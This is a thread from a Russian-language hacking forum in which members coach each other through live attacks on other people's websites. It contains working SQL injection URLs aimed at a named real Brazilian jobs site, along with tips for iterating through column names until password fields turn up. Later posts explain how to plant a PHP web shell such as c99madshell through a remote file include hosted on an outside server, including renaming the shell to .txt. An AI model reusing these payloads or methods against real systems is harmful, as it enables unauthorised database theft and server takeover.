ANTICHAT.XYZ    VIDEO.ANTICHAT.XYZ    НОВЫЕ СООБЩЕНИЯ    ФОРУМ  
Баннер 1   Баннер 2
Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей. Здесь обсуждаются безопасность, программирование, технологии и многое другое. Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz
Вернуться   Форум АНТИЧАТ > Безопасность и Уязвимости > Уязвимости
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

  #11751  
Старый 28.02.2010, 08:31
Аватар для LokbatanLi
LokbatanLi
Участник форума
Регистрация: 24.08.2009
Сообщений: 172
Провел на форуме:
1535319

Репутация: -16
Отправить сообщение для LokbatanLi с помощью ICQ
По умолчанию

ne polucaetsya..
 
Ответить с цитированием

  #11752  
Старый 28.02.2010, 08:36
Аватар для Seravin
Seravin
Участник форума
Регистрация: 25.11.2009
Сообщений: 201
Провел на форуме:
866555

Репутация: 226
По умолчанию

Цитата:
Сообщение от LokbatanLi  
ne polucaetsya..
ты прикалываешься?
Код:
http://www.unialco.com.br/jobs/details.php?id=-48%27+union+select+1,2,GROUP_CONCAT(TABLE_NAME),4,5,6,7,8,9,10+FROM+information_schema.tables+where+table_name%3E0x75736572+--+
А что ты вообще сделать хочешь?
 
Ответить с цитированием

  #11753  
Старый 28.02.2010, 08:41
Аватар для LokbatanLi
LokbatanLi
Участник форума
Регистрация: 24.08.2009
Сообщений: 172
Провел на форуме:
1535319

Репутация: -16
Отправить сообщение для LokbatanLi с помощью ICQ
По умолчанию

я ету знаю..мне нуэн вот здес написат полное имя..

http://www.unialco.com.br/jobs/details.php?id=-48%27+union+select+1,2,GROUP_CONCAT(COLUMN_NAME),4 ,5,6,7,8,9,10+FROM+information_schema.columns+WHER E+table_name=0x7573657273+AND+ASCII(LOWER(COLUMN_N AME))=x75736572+--+

в конце написат полное имя таблици..и в какоы кодировке как написать ??
 
Ответить с цитированием

  #11754  
Старый 28.02.2010, 08:47
Аватар для Seravin
Seravin
Участник форума
Регистрация: 25.11.2009
Сообщений: 201
Провел на форуме:
866555

Репутация: 226
По умолчанию

Цитата:
Сообщение от LokbatanLi  
я ету знаю..мне нуэн вот здес написат полное имя..

http://www.unialco.com.br/jobs/details.php?id=-48%27+union+select+1,2,GROUP_CONCAT(COLUMN_NAME),4 ,5,6,7,8,9,10+FROM+information_schema.columns+WHER E+table_name=0x7573657273+AND+ASCII(LOWER(COLUMN_N AME))=x75736572+--+

в конце написат полное имя таблици..и в какоы кодировке как написать ??
Код:
http://www.unialco.com.br/jobs/details.php?id=-48%27+union+select+1,2,GROUP_CONCAT(COLUMN_NAME),4%20,5,6,7,8,9,10+FROM+information_schema.columns+WHERE+table_name=0x7573657273+--+
Открываешь исходный код, ищешь к примеру password и там все колонки, а вообще просто дописываешь and+column_name>hex твоей последней полученной колонки. Не глупи, и сам экспериментируй
 
Ответить с цитированием

  #11755  
Старый 28.02.2010, 13:43
Аватар для Sams
Sams
Участник форума
Регистрация: 18.04.2009
Сообщений: 120
Провел на форуме:
435863

Репутация: 80
По умолчанию

Ребята, я вроде как не полный новичок, просто никогда не работал с шелами. Но надо же когда-то начинать
Вопрос больше по теоретической части, по поводу запуска шела через php-include.
Вот есть у меня на сайте шел http://mysite.com/shell.php, и есть инклуд (глобальный) http://site.com/index.php?dir=asdsad.
Делаем так: http://site.com/index.php?dir=http://mysite.com./shell.php%00 (только не надо говорить, что такие ситуации сейчас встречаются редко и т.д. просто представим такую ситуацию, что все работает).
Ну и собственно у меня появляется на мониторе мой шел. А теперь объясните мне, какой от него толк?! Ведь шел залит-то на моём сайте, и отображает директории все и информацию именно о моём сайте Просто отобразился мой шел с моего сайта на сайте site.com как бы в отдельном фрейме.
Может быть у меня какое-то размытое понятие о шелах, об их разновидностях и использовании. Сам юзаю c99madshell.
Увы, детальную инфу о шелах на форуме не нашел. Если я где-то что-то провтыкал, прошу указать, где можно об этом почитать. Заранее благодарен

Последний раз редактировалось Sams; 28.02.2010 в 13:48..
 
Ответить с цитированием

  #11756  
Старый 28.02.2010, 13:45
Аватар для $n@ke
$n@ke
Постоянный
Регистрация: 18.09.2006
Сообщений: 867
Провел на форуме:
2805813

Репутация: 1396


По умолчанию

Если там всеже ремоут инклюд,а не фрейм, тогда переименуй свой шелл в
http://mysite.com/shell.txt

и пробуй так
 
Ответить с цитированием

  #11757  
Старый 28.02.2010, 13:52
Аватар для t3zo
t3zo
Новичок
Регистрация: 18.02.2010
Сообщений: 20
Провел на форуме:
63443

Репутация: 33
По умолчанию

Проблема в том что у тя сайт поддерживает пхп а надо шелл держать либо на хосте без пхп, или изменить расширение....
 
Ответить с цитированием

  #11758  
Старый 28.02.2010, 14:01
Аватар для Sams
Sams
Участник форума
Регистрация: 18.04.2009
Сообщений: 120
Провел на форуме:
435863

Репутация: 80
По умолчанию

Да, точно, http://mysite.com/shell.txt заработало
Хм, теперь стало чуть понятней принцип. Спасибо.
А может кто-то дать ссылку на хорошую инфу по шелам? И каким лучше всего шелом пользоваться?
 
Ответить с цитированием

  #11759  
Старый 28.02.2010, 14:03
Аватар для t3zo
t3zo
Новичок
Регистрация: 18.02.2010
Сообщений: 20
Провел на форуме:
63443

Репутация: 33
По умолчанию

редкий шелл - но крутой dxshell.

лит-ры в основном нету, шелл это файловый менеджер.+ выполнение смд


Постучись ко мне - скажи что не понимаешь объясню
 
Ответить с цитированием

  #11760  
Старый 28.02.2010, 15:00
Аватар для kfor
kfor
Участник форума
Регистрация: 01.09.2005
Сообщений: 194
Провел на форуме:
818095

Репутация: 34
Отправить сообщение для kfor с помощью ICQ
По умолчанию

Sams, либо просто запихай шелл в папку с .htaccess в котором укажи что бы .php исполнялось как text.
 
Ответить с цитированием
Ответ



Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Ваши ламерские приколы (Ну когда только комп появился) PEPSICOLA Болталка 188 23.05.2010 10:05
Ваши любимые компьютерные игры PEPSICOLA Болталка 280 19.08.2009 00:01
Ваши телеги... F-IFTY Болталка 13 18.08.2009 18:22
Вопросы по Ipb 2.0 Voodoo_People Форумы 26 15.02.2005 22:57



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ